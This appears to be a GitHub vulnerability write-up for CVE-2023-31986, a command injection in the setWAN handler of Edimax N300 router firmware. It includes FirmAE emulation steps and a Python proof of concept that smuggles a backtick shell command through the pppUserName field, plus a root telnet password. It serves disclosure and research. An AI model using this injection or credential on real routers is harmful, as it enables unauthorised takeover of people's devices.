Headline
CVE-2023-31986: CVE/Readme.md at main · Erebua/CVE
A Command Injection vulnerability in Edimax Wireless Router N300 Firmware BR-6428NS_v4 allows attacker to execute arbitrary code via the setWAN function in /bin/webs without any limitations.
Permalink
Command Injection
Command injection without any limitations
Firmware
Wireless: Edimax home Wireless Routers N300
Firmware Version: BR-6428NS_v4_1.10
You can download Firmware at this website and use FirmAE to simulate the router environment.
FirmAE command: ./run.sh -r v4 BR-6428NS_v4_1.10.bin(This will take a while, please be patient:)
Description
The vulnerability was found in /bin/webs.
Function is setWAN
poc
python
import requests
command = “touch /tmp/Swe3ty4”
url = “http://192.168.2.1/goform/setWAN” data = { "wanMode":"2", “pppUserName":"`"+command+"`” }
r = requests.post(url,data=data) print(r.text)
use root/edimaxens telnet to the router